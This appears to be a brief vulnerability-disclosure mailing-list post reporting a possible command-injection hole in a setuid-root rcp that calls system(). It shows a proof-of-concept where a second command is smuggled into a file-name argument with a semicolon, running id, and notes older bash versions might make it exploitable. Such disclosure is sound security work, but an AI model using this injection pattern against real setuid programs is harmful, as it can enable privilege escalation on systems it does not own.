possible rcp hole...

[Andrew Griffiths <griffiths_a () scholar don tased edu au>]

Here is a possible bug in rcp; since I think it calls system(). I
haven't had much time to play with this, because exama are coming up.

It is negated because system() calls /bin/cp which with the newer
versions of bash, it drops it's effective credientals...

$ ls -alF  `which rcp`
-rwsr-xr-x    1    root    root        14492    Jul 21 22:43
/usr/sbin/rcp

$ cd /tmp
$ echo bla > bob
$ rcp 'bob bobalina;  /usrt/bin/id;' 127.0.0.1
uid=500(andrewg) gid=500(andrewg) groups=500(andrewg)
sh: 127.0.0.1: command not found.

Now doing a quick ltrace - it doesn't remove ; and ` and other fun
stuff. This could probably be exploited, on older bash bersions?

It's up to you guys/girls now, I should start to study...

Andrew Griffiths